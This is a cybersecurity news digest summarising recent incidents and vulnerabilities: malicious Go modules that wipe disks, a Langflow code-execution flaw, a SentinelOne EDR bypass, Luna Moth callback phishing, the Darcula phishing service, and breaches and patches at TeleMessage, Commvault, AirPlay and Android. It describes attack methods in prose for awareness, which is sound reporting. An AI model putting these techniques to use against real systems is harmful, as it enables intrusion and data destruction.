Daily Brief

Microsoft has issued a warning regarding the potential security weaknesses in using default Helm charts for Kubernetes deployments. Helm charts, which simplify the deployment process of applications on Kubernetes, often come with default settings that prioritize convenience over security, leading to potential misconfigurations. These misconfigurations can expose sensitive data, cloud resources, or entire environments, making them vulnerable to attacks. Key vulnerabilities include exposing services to the internet without adequate network controls and lacking sufficient authentication or authorization safeguards. Microsoft's research team advises reviewing and adjusting the configurations in Helm charts and YAML manifests based on security best practices. Regular scans of publicly facing interfaces and ongoing monitoring of container activities are recommended to detect and mitigate threats. The issue is significant because many exploits of containerized applications originate from these default and negligent configurations.

Microsoft Entra ID is critical for identity management in business, heavily targeted with over 600 million daily attacks. Despite built-in protections such as multifactor authentication and conditional access, gaps remain in Microsoft Entra ID’s native security. Companies experience significant disruptions from breaches, including downtime, failed audits, and reputational damage. Microsoft's model indicates user responsibility for data backup, highlighting the importance of a dedicated backup strategy. Limitations in native recovery tools, like the Recycle Bin’s brief retention period, underscore the need for robust backup solutions. Effective backup strategies should align with organizational risk profiles, balancing protection needs against cost and resource availability. Tailored backup approaches enhance resilience, ensuring businesses can recover swiftly and continue operations despite threats. Veeam Data Cloud offers enhanced management and recovery solutions, catering to the inherent limitations of native Entra ID protections.

Researchers identified a supply-chain attack using malicious Go modules on GitHub designed to target Linux servers. The malware, contained within three Go modules, executes a disk-wiping script that leads to irreversible data loss and system failure. The destructive payload, a Bash script named done.sh, uses a 'dd' command to overwrite all data on the primary Linux storage volume, /dev/sda. This form of attack checks for a Linux environment before execution, ensuring it only affects Linux systems. The obfuscated code within the modules retrieves and immediately executes a remote wiper script, leaving minimal response time for mitigation. Impersonated Go modules mimicked legitimate projects, increasing the likelihood of developers inadvertently integrating malicious code into their applications. The decentralized nature of the Go ecosystem, with its lack of stringent verification, facilitates this type of malware dissemination. GitHub has since removed the identified malicious modules from its platform to prevent further spread.

Google released its May 2025 security update fixing 46 vulnerabilities, including a critically exploited security flaw. CVE-2025-27363, a high-severity vulnerability located in the System component, enables local code execution without extra privileges. The vulnerability is linked to an out-of-bounds write bug in the FreeType font rendering library and affects the processing of TrueType and variable fonts. Originally reported by Facebook in March 2025, CVE-2025-27363 was actively exploited in the wild prior to the update. Google upgraded FreeType to version higher than 2.13.0 to remediate the vulnerability. The security update also addressed additional issues in the Android System and Framework, enhancing protection against privilege escalation, data leaks, and service disruptions. Google has emphasized that the exploitation risks are mitigated by security improvements in newer Android versions and urged users to update their devices.

Critical security flaw in Langflow platform, CVE-2025-3248, now in the CISA's Known Exploited Vulnerabilities catalog due to active exploitation evidence. The flaw possesses a high severity score of 9.8 and enables remote, unauthenticated attackers to execute arbitrary code through the /api/v1/validate/code endpoint. Attack methodology involves misuse of Python’s exec() function without proper authentication or security measures in place, facilitating remote command execution on affected servers. While the vulnerability impacts multiple versions of Langflow, a fix has been provided in the latest version 1.3.0, released on March 31, 2025. Researchers at Horizon3.ai discovered and reported the vulnerability; it is deemed "easily exploitable" and potentially allows full server control. A proof-of-concept for the exploit was made public on April 9, 2025, increasing the urgency for patch implementations. Over 400 internet-exposed instances of Langflow have been identified, predominantly in the US, Germany, Singapore, India, and China. CISA mandates Federal Civilian Executive Branch agencies to patch the vulnerability by May 26, 2025, underlining the critical nature of the flaw.

President Trump's 2026 budget proposal recommends a $491 million cut for the Cybersecurity and Infrastructure Security Agency (CISA), a 17% reduction from its current funding. The proposed budget cuts are part of Trump's critique of CISA’s focus on countering online misinformation and election security, which he terms the "censorship industrial complex." In contrast to CISA's reduced funding, the Department of Homeland Security would receive a significant budget increase, specifically for enhancing border security and immigration enforcement. The criticism of CISA includes allegations of violating free speech by focusing on misinformation and self-promotion rather than protecting critical infrastructure. The budget proposal also contains financial reductions for other security agencies, including TSA and FEMA, citing reasons related to political bias and inefficiency. Trump has historically challenged the legitimacy of his election loss in 2020, influencing his stance on CISA's operations. Although a contentious proposal, it faces substantial challenges in Congress, with significant opposition expected, particularly regarding cuts to cybersecurity funding.

Luna Moth, also known as Silent Ransom Group, has increased data theft and extortion attacks on U.S. legal and financial sectors. These threat actors use callback phishing campaigns to gain remote access and steal sensitive data through social engineering tactics, without deploying ransomware. Attackers register fake domains through GoDaddy, mimicking IT support for major U.S. law and financial firms, to facilitate their scams. Victims are tricked into calling fake helpdesk numbers embedded in emails, where they are persuaded to install remote monitoring software, giving hackers direct access to their systems. Common tools exploited in these attacks include legitimate RMM software like Syncro, SuperOps, Zoho Assist, Atera, AnyDesk, and Splashtop, which are less likely to be detected as threats. Once access is gained, hackers spread through the network, searching and extracting valuable data, which they threaten to publish unless a ransom is paid. EclecticIQ’s report suggests adding indicators of compromise to blocklists and advises restricting the use of unapproved RMM tools to mitigate risk.

An unknown attacker accessed US government communications through TeleMessage, a clone of the secure messaging app Signal, used by Michael Waltz. TeleMessage, acquired by Smarsh in 2024, has temporarily shut down following the detection of the security incident, with investigations supported by an external cybersecurity firm. The exposure includes potentially unencrypted archived messages touching on sensitive topics from US Customs and Border Protection and financial transactions. The compromised app, discovered through a leaked photo of Waltz using it, was found to archive messages which could be insecure if not re-encrypted. Further analysis by journalists revealed hard-coded credentials in the app’s source code, suggesting significant security flaws. The incident raises questions about the legality of the app under Signal's open source license and its implications for security practices. Overall, the mishap underscores ongoing issues with secure communication within government circles and its ramifications on national security.

A new EDR bypass method, "Bring Your Own Installer," has been identified being used to install Babuk ransomware. This bypass technique, abusing the SentinelOne agent upgrade process, was uncovered by Aon's Stroz Friedberg Incident Response team. Attackers exploit a gap during the agent update that allows them to disable the EDR, leaving systems unprotected. It is recommended for SentinelOne users to enable the "Online Authorization" feature to prevent such attacks. Further investigations confirmed the bypass method works across multiple versions of the SentinelOne agent. After discovery, SentinelOne communicated mitigation steps to clients and other major EDR vendors. SentinelOne advises enabling Local Upgrade protection to strengthen security against such vulnerabilities. The impact of this bypass technique was first noticed during a forensic investigation of a client network following a ransomware breach.

Microsoft highlighted security risks in default Kubernetes Helm charts, which could expose sensitive data. Helm charts, crucial for streamlined application deployment on Kubernetes, often come with weak default settings, including lax authentication and exposed ports. Without adjustments, these settings leave applications vulnerable to scanning and exploitation by malicious actors. The report by Microsoft Defender for Cloud Research emphasized insecure default configurations in Helm charts as a significant threat to Kubernetes workloads. Three specific cases were cited indicating the scope of security issues across different Helm chart deployments. Microsoft advises users to manually review and secure YAML configurations and Helm charts before deployment. Regular scans for configuration errors and vigilant monitoring for unusual activities in container environments were recommended as part of the security practices.

The Darcula PhaaS platform facilitated the theft of 884,000 credit cards through 13 million malicious text message clicks over a seven-month period from 2023 to 2024. Researchers from multiple international organizations, including NRK and Mnemonic, uncovered the operation, highlighting its global reach across over 100 countries and 20,000 domains imitating major brands. Darcula's phishing texts typically masquerade as road toll fines or package delivery notices, tricking victims into providing account credentials on spoofed websites. Innovations in the platform include the use of RCS and iMessage for sending texts, a feature that increases the effectiveness of these phishing attacks. Recent upgrades to Darcula add capabilities like auto-generating phishing kits for any brand, incorporating stealth features, converting stolen credit card details to virtual cards, and simplifying the admin panel. Introduction of generative AI into Darcula by April 2025 allows criminals to create custom scams in any language using LLM tools. Investigation revealed the backbone toolkit 'Magic Cat,' the operation's connection to a Chinese individual, and lavish lifestyles funded by the scam. All findings were shared with law enforcement, uncovering operations involving large-scale SIM farms and processing setups for handling stolen credit cards.

TeleMessage, an Israeli company, experienced a potential security breach leading to the suspension of its services. This incident occurred with the company's TM SGNL tool, used for archiving messages from apps like Signal. A hacker claimed to breach TeleMessage and accessed data, though direct messages from Trump officials were reportedly safe. Stolen data may include government officials' contact details, some message contents, and back-end credentials. Screenshots from the breach show links to U.S. Customs and Border Protection and other financial institutions. The source code for the backdoored app, TM SGNL, analyzed by experts, revealed multiple vulnerabilities. Signal’s official spokesperson emphasized that the company does not guarantee security for unofficial app versions. Smarsh, the parent company, engages a cybersecurity firm to investigate and has promised transparency and updates.

The Darcula phishing-as-a-service platform stole 884,000 credit cards from SMS phishing attacks, impacting 13 million users globally. Over seven months, Darcula's cybercriminals utilized 20,000 domains to spoof reputable brands, targeting Android and iPhone users across more than 100 countries. Darcula has evolved to use RCS and iMessage in addition to SMS, increasing the effectiveness of their phishing attacks. New features allow criminals to automatically generate phishing kits for any brand and employ generative AI to create more convincing and language-specific scams. Mnemonic researchers reverse-engineered the Darcula infrastructure, discovering the 'Magic Cat' toolkit and infiltrating related Telegram groups. The investigation traced digital footprints to a Chinese individual believed to be the creator; despite company denials of involvement, ongoing activities suggest continuous operation. All findings from the investigation have been shared with law enforcement to aid in tackling this extensive cybercrime operation.

Researchers disclosed critical vulnerabilities in Apple's AirPlay protocol that could allow attackers remote control over devices. The vulnerabilities, named AirBorne, were found in both Apple and third-party devices utilizing the AirPlay SDK. Specific flaws, such as CVE-2025-24252 and CVE-2025-24132, enable a wormable zero-click remote code execution (RCE) exploit, allowing malware to spread across networks. Attackers could exploit these vulnerabilities to deploy ransomware and backdoors, significantly threatening user data security. Devices connected to public Wi-Fi are at high risk, with potential breaches extending to enterprise networks when compromised devices connect to them. All identified vulnerabilities have been patched in recent AirPlay and CarPlay updates. Organizations are urged to update all susceptible devices immediately and to advise employees to do the same for personal devices.

CISA has included a severe security vulnerability from Commvault in its Known Exploited Vulnerabilities catalog. The vulnerability, identified as CVE-2025-34028 with a CVSS score of 10.0, is a path traversal flaw in Commvault Command Center versions 11.38.0 through 11.38.19. The issue, which allows code execution through malicious ZIP file uploads, was discovered and reported by watchTowr Labs. Commvault has patched the vulnerability in newer releases, specifically versions 11.38.20 and 11.38.25. This vulnerability marks the second time a Commvault flaw has been actively exploited; the prior CVE-2025-3928 also involved remote attack capabilities. Affected agencies, notably those within the Federal Civilian Executive Branch, are mandated to apply the security patches by May 23, 2025, to mitigate risks. No unauthorized access to customer backup data has been detected despite the exploitation incidents.